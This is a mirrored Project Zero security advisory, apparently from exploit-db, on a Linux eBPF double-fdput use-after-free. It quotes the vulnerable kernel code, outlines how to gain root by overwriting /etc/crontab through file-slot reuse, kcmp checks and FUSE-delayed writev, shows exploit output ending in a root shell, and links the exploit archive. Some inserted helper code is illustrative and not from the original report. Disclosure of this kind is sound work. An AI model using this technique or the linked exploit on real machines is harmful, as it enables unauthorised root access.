A mirror of the content stored in 39772.txt obtained through exploit-db.com
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.
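
As a rough illustration of the runtime precondition above, the sysctl can be read through procfs. This is a minimal sketch, not part of the original report: the helper name read_unprivileged_bpf_disabled() is hypothetical, and it assumes the sysctl is exposed at /proc/sys/kernel/unprivileged_bpf_disabled, which is the usual procfs mapping for kernel.* sysctls.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical helper: read an integer sysctl value from the given path.
 * Returns the value found in the file, or -1 if the file is missing or
 * does not contain an integer (for example on a kernel that does not
 * provide this sysctl).
 */
int read_unprivileged_bpf_disabled(const char *path)
{
	FILE *fp;
	int value = -1;

	assert(path != NULL);
	fp = fopen(path, "r");
	if (!fp)
		return -1;
	if (fscanf(fp, "%d", &value) != 1)
		value = -1;
	fclose(fp);
	return value;
}
```

Calling it with "/proc/sys/kernel/unprivileged_bpf_disabled" and getting 0 would indicate that the sysctl has not been set to 1; a result of -1 only says that the file could not be read.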

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

/* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
	struct bpf_insn *insn = env->prog->insnsi;
	int insn_cnt = env->prog->len;
	int i, j;

	for (i = 0; i < insn_cnt; i++, insn++) {
		[checks for bad instructions]

		if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
			struct bpf_map *map;
			struct fd f;

			[checks for bad instructions]

			f = fdget(insn->imm);
			map = __bpf_map_get(f);
			if (IS_ERR(map)) {
				verbose("fd %d is not pointing to valid bpf_map\n",
					insn->imm);
				fdput(f);
				return PTR_ERR(map);
			}

			[...]
		}
	}
	[...]
}

__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.
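
The reference-count arithmetic described above can be followed in a small userspace model. This is only a sketch: every model_* name is hypothetical, the structures are simplified stand-ins for the kernel's struct file and struct fd, and the FDPUT_FPUT value is chosen for illustration. The success path (releasing the reference once the map has been looked up) is an assumption, since the quoted kernel code elides it.

```c
#include <assert.h>
#include <stddef.h>

#define FDPUT_FPUT 1u	/* same name as the kernel flag; value is illustrative */

struct model_file { long f_count; int is_bpf_map; };
struct model_fd { struct model_file *file; unsigned int flags; };

/* Model of fdget(): an extra reference is taken only when the fd table
 * is shared with another task, and FDPUT_FPUT records that fact. */
struct model_fd model_fdget(struct model_file *file, int table_shared)
{
	struct model_fd f = { file, 0 };

	if (file && table_shared) {
		file->f_count++;
		f.flags = FDPUT_FPUT;
	}
	return f;
}

/* Model of fdput(): drop the reference only if fdget() took one. */
void model_fdput(struct model_fd f)
{
	if (f.flags & FDPUT_FPUT)
		f.file->f_count--;
}

/* Mirrors the quoted __bpf_map_get(): releases the fd on the error path. */
int model_bpf_map_get(struct model_fd f)
{
	if (!f.file)
		return -1;
	if (!f.file->is_bpf_map) {
		model_fdput(f);		/* first put */
		return -1;
	}
	return 0;
}

/* Mirrors the caller: puts again on error. Returns f_count afterwards. */
long model_load_with_fd(struct model_file *file, int table_shared)
{
	struct model_fd f;

	assert(file != NULL);
	f = model_fdget(file, table_shared);
	if (model_bpf_map_get(f) < 0)
		model_fdput(f);		/* second put: the bug */
	else
		model_fdput(f);		/* assumed balanced success path */
	return file->f_count;
}
```

Starting from f_count == 1 (the reference held by the fd table), a non-map file with a shared table ends at 0 in this model, which corresponds to the file being freed while the table still points to it. With an unshared table, or with a real map, the count stays at 1.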

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a read-only file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a read-only file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

First, the attacker should ideally be able to determine whether a newly
allocated struct file is located at the same address as the previously freed
one. Linux provides a syscall that performs exactly this comparison for the
caller: kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

Second, in order to make exploitation more reliable, the attacker should be
able to pause code execution in the kernel between the writability check of the
target file and the actual write operation. This can be done by abusing the
writev() syscall and FUSE: The attacker mounts a FUSE filesystem that
artificially delays read accesses, then mmap()s a file containing a struct iovec
from that FUSE filesystem and passes the result of mmap() to writev(). (Another
way to do this would be to use the userfaultfd() syscall.)
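
The kcmp() comparison mentioned above can be tried on ordinary descriptors. The following is a minimal sketch, not taken from the exploit: the wrapper name same_struct_file() is hypothetical, and it assumes that glibc offers no kcmp() wrapper, so the call goes through syscall(). On kernels built without kcmp support, or under a seccomp policy that blocks it, the call fails with -1.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <linux/kcmp.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical wrapper around kcmp(2) with KCMP_FILE.
 * Returns 0 if both descriptors of the calling process refer to the same
 * struct file, a positive value (1, 2 or 3) if they do not, and -1 if
 * the syscall itself fails.
 */
long same_struct_file(int fd_a, int fd_b)
{
	pid_t self = getpid();

	assert(fd_a >= 0 && fd_b >= 0);
	return syscall(SYS_kcmp, (long)self, (long)self, (long)KCMP_FILE,
		       (unsigned long)fd_a, (unsigned long)fd_b);
}
```

For example, a descriptor and its dup() share one struct file, so comparing them is expected to yield 0 where kcmp is available, while the two ends of a pipe are distinct files and yield a nonzero result.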

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the page fault,
allowing the attacker to suspend code execution in the kernel at that point for
an arbitrary length of time.
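
The mechanism described above, where the kernel has to fault in the page holding the struct iovec while it is already inside writev(), can be observed harmlessly with a regular file. This is a sketch under stated assumptions: the function name writev_with_mapped_iovec() is hypothetical, an ordinary temporary file under /tmp stands in for the FUSE-backed file, and nothing here delays the fault.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/uio.h>
#include <unistd.h>

/*
 * Hypothetical demo: store a struct iovec in a file, map the file, and
 * hand the mapping to writev() without touching it from userspace first.
 * The kernel's copy of the iovec array is then the first access to the
 * mapping, so the page fault is taken inside the syscall and resolved by
 * whatever filesystem backs the file.
 * Returns the number of bytes written to out_fd, or -1 on error.
 */
ssize_t writev_with_mapped_iovec(int out_fd, const char *msg)
{
	char path[] = "/tmp/mapped_iovec_XXXXXX";
	struct iovec iov, *mapped;
	long page = sysconf(_SC_PAGESIZE);
	ssize_t ret;
	int backing_fd;

	assert(msg != NULL);
	backing_fd = mkstemp(path);
	if (backing_fd < 0)
		return -1;
	unlink(path);

	/* Put the iovec into the file with pwrite(), not via the mapping. */
	iov.iov_base = (void *)msg;
	iov.iov_len = strlen(msg);
	if (pwrite(backing_fd, &iov, sizeof(iov), 0) != (ssize_t)sizeof(iov)) {
		close(backing_fd);
		return -1;
	}

	mapped = mmap(NULL, (size_t)page, PROT_READ, MAP_SHARED, backing_fd, 0);
	close(backing_fd);
	if (mapped == MAP_FAILED)
		return -1;

	ret = writev(out_fd, mapped, 1);
	munmap(mapped, (size_t)page);
	return ret;
}
```

With a local filesystem the fault is resolved almost immediately, so the write simply completes; the point of the sketch is only where the fault happens, not how long it takes.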

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on an Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7

Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip